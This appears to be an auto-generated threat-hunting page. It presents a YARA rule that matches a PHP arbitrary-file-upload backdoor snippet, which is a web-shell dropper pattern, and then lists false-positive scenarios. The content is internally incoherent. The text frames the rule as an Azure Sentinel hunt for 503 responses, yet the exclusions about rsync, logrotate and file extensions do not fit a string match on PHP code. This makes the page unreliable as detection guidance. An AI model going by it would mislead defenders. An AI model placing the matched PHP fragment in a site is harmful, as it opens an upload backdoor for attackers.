Adversaries may use a 503 service unavailable response to obfuscate the upload of hidden files, potentially exfiltrating data or establishing persistence. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify covert data transfer methods that evade standard detection mechanisms.
YARA Rule
rule hidden_file_upload_in_503 {
strings: $ = /error_reporting\(0\);\$f=\$_FILES\[\w+\];copy\(\$f\[tmp_name\],\$f\[name\]\);error_reporting\(E_ALL\);/
condition: any of them
}This YARA rule can be deployed in the following contexts:
This rule contains 1 string patterns in its detection logic.
Scenario: System backup using rsync
Description: A scheduled backup job using rsync uploads a hidden file as part of a full system backup.
Filter/Exclusion: Exclude files with the .backup extension or files uploaded by the rsync process with a known backup timestamp.
Scenario: Admin task to clean up temporary files
Description: An administrator manually deletes or moves temporary files, some of which are hidden, using a script or command-line tool like rm or find.
Filter/Exclusion: Exclude files with the .tmp or .log extensions, or files modified by the root user within a known maintenance window.
Scenario: Log rotation using logrotate
Description: The logrotate utility rotates and compresses log files, which may include hidden files or temporary files during the rotation process.
Filter/Exclusion: Exclude files with the .gz or .tar.gz extensions, or files modified by the logrotate service.
Scenario: Configuration management tool deployment
Description: A configuration management tool like Ansible or Puppet uploads hidden configuration files during a deployment, which are legitimate system files.
Filter/Exclusion: Exclude files with the .cfg or .conf extensions, or files uploaded by the Ansible or Puppet agent with a known deployment timestamp.
Scenario: User-generated hidden files for personal use
Description: A user creates hidden files (e.g., .secret or .notes) for personal data storage, which may be flagged by the rule.
Filter/Exclusion: Exclude files owned by regular users with the .hidden or .personal extension, or files created in a user-specific directory like ~/.local/.